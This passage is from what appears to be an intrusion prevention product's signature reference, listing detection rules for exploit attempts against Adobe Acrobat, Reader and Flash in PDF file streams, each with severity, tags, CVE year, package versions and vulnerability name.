About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-CustomDictionaryOpen-BOF

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Unix, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Unix not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Adobe-Reader-JavaScript-Spell.customDictionaryOpen-Method-Memory-Corruption
Description:
Back to top

File-PDF_Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-725-5211
Vulnerability: Adobe-Acrobat--Embedded-JBIG2-Stream-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-725-5211
Vulnerability: Adobe-Acrobat--Embedded-JBIG2-Stream-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-Flatedecode-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-870-5242
Vulnerability: Adobe-Acrobat-Flatedecode-Integer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-Font-Processing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2008, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Acrobat-PDF-Font-Processing-Memory-Corruption
Description:
Back to top

File-PDF_Adobe-Acrobat-GetAnnots-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Acrobat-JavaScript-GetAnnots-Memory-Corruption
Description:
Back to top

File-PDF_Adobe-Acrobat-Gotoe-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Adobe-Acrobat-And-Reader-PDF-Gotoe-Information-Disclosure
Description:
Back to top

File-PDF_Adobe-Acrobat-JavaScript-Field-Name-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2015 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1270-5242
Vulnerability: Adobe-Acrobat-And-Reader-JavaScript-Field-Name-Out-Of-Bounds-Read
Description:
Back to top

File-PDF_Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Professional detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1552-5242
Vulnerability: Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4990

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1070-5242
Vulnerability: Adobe-Acrobat-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4990
Description:
Back to top

File-PDF_Adobe-Acrobat-JPXDecode-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Acrobat-JPXDecode-Memory-Corruption
Description:
Back to top

File-PDF_Adobe-Acrobat-Media-Newplayer-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1848-5242
Vulnerability: Adobe-Acrobat-Media-Newplayer-Code-Execution
Description:
Back to top

File-PDF_Adobe-Acrobat-Ocg-Setintent-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1051-5242
Vulnerability: Adobe-Acrobat-Ocg-Setintent-Integer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-PDF-Formatstring

About this situation: Detected possible attempt to exploit Adobe pdf reader format strings vulnerability
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Adobe-Acrobat-PDF-BOF
Description:
Back to top

File-PDF_Adobe-Acrobat-Pro-Dc-Acroform-setFocus-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat DC (Classic) detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1213-5242
Vulnerability: Adobe-Acrobat-Pro-Dc-Acroform-setFocus-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-Pro-Dc-Fdf-Object-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe System Acrobat Pro DC detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat Pro, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Vulnerability: Adobe-Acrobat-Pro-Dc-Fdf-Object-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-Pro-Dc-JavaScript-Submitform-Url-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat Pro DC detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat Pro, CVE2020, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Vulnerability: Adobe-Acrobat-Pro-Dc-JavaScript-Submitform-Url-Out-Of-Bounds-Read
Description:
Back to top

File-PDF_Adobe-Acrobat-Pro-Information-Disclosure-CVE-2015-3058

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Pro detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat Pro, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Adobe-Acrobat-Pro-Information-Disclosure-CVE-2015-3058
Description:
Back to top

File-PDF_Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3053

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Pro detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat Pro, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3053
Description:
Back to top

File-PDF_Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3054

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Pro detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat Pro, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-647-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Adobe-Acrobat-Pro-Use-After-Free-CVE-2015-3054
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Dc-Annots-File-Id-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat Reader DC detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Adobe-Acrobat-Reader-Dc-Annots-File-Id-Out-Of-Bounds-Read
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Dc-Annots.api-Setprops-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader DC detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1858-5242
Vulnerability: Adobe-Acrobat-Reader-Dc-Annots.api-Setprops-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Dc-Escript.api-Thermometer-Object-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat Reader
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1370-5242
Vulnerability: Adobe-Acrobat-Reader-Dc-Escript.api-Thermometer-Object-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Dc-Jpeg2000-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1353-5242
Vulnerability: Adobe-Acrobat-Reader-Dc-Jpeg2000-Heap-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Dc-Path-Join-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1359-5242
Last changed: sgpkg-ips-1359-5242
Vulnerability: Adobe-Acrobat-Reader-Dc-Path-Join-Out-Of-Bounds-Read
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Dc-Window-Procedure-wm_setFocus-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat Reader
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1371-5242
Last changed: sgpkg-ips-1371-5242
Vulnerability: Adobe-Acrobat-Reader-Dc-Window-Procedure-wm_setFocus-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Esobject-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2015 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1288-5242
Vulnerability: Adobe-Acrobat-Reader-Esobject-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2946

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2946
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2949

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Acrobat-Reader-Heap-Overflow-CVE-2017-2949
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-JBIG2-CVE-2013-3352

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-558-5211
Vulnerability: Adobe-Acrobat-Reader-JBIG2-CVE-2013-3352
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Jpeg2000-CVE-2016-6941-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat DC (Classic) detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-825-5242
Last changed: sgpkg-ips-826-5242
Vulnerability: Adobe-Acrobat-Reader-Jpeg2000-CVE-2016-6941-Information-Disclosure
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Jpeg2000-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat DC (Classic) detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-821-5242
Last changed: sgpkg-ips-821-5242
Vulnerability: Adobe-Acrobat-Reader-Jpeg2000-Information-Disclosure
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6942

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-810-5242
Vulnerability: Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6942
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6970

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-810-5242
Vulnerability: Adobe-Acrobat-Reader-Memory-Corruption-CVE-2016-6970
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2941

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Acrobat-Reader-Memory-Corruption-CVE-2017-2941
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6957

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-810-5242
Vulnerability: Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6957
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6958

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-810-5242
Vulnerability: Adobe-Acrobat-Reader-Security-Bypass-CVE-2016-6958
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Stack-Overflow-CVE-2017-2948

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Acrobat-Reader-Stack-Overflow-CVE-2017-2948
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Toolbutton-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-558-5211
Last changed: sgpkg-ips-714-5211
Vulnerability: Adobe-Acrobat-Reader-Toolbutton-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Type-Confusion-CVE-2017-2962

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Acrobat-Reader-Type-Confusion-CVE-2017-2962
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-503-5211
Vulnerability: Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption

About this situation: A malicious PDF file targeted to exploit a memory corruption vulnerability in Adobe Acrobat Reader and Acrobat Professional products over HTTP detected
Context: PDF File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6944

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-810-5242
Vulnerability: Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6944
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6945

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-810-5242
Last changed: sgpkg-ips-810-5242
Vulnerability: Adobe-Acrobat-Reader-Use-After-Free-CVE-2016-6945
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2955

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2955
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2956

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2956
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2961

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-840-5242
Vulnerability: Adobe-Acrobat-Reader-Use-After-Free-CVE-2017-2961
Description:
Back to top

File-PDF_Adobe-Acrobat-Reader-Xfa-Formcalc-Replace-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat DC detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-771-5211
Vulnerability: Adobe-Acrobat-Reader-Xfa-Formcalc-Replace-Integer-Overflow
Description:
Back to top

File-PDF_Adobe-authplay.dll-CVE-2010-1297-Exploit

About this situation: A malicious PDF file targeting CVE-2010-1297 over HTTP detected
Context: PDF File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Reader, Adobe Acrobat, CVE2010, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-682-5211
Vulnerability: Adobe-authplay.dll-Code-Execution-CVE-2010-1297
Description:
Back to top

File-PDF_Adobe-Flash-Exploit-CVE-2011-0609

About this situation: Detected attempt to exploit a vulnerability in Adobe Flash
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-674-5211
Vulnerability: Adobe-Flash-Vulnerability-CVE-2011-0609
Description:
Back to top

File-PDF_Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-BOF-Malware

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-Stack-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-BOF-Malware-2

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Adobe-Reader-And-Acrobat-Libtiff-Tifffetchshortpair-Stack-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Reader-And-Acrobat-Printf-Stack-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Reader-And-Acrobat-Rle-Encoded-BMP-File-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-525-5211
Vulnerability: Adobe-Reader-And-Acrobat-Rle-Encoded-BMP-File-Integer-Overflow
Description:
Back to top

File-PDF_Adobe-Reader-And-Acrobat-Rma-Objects-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-487-5211
Last changed: sgpkg-ips-487-5211
Vulnerability: Adobe-Reader-And-Acrobat-Rma-Objects-Memory-Corruption
Description:
Back to top

File-PDF_Adobe-Reader-And-Acrobat-Sandbox-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: PDF File Stream
Severity: 7
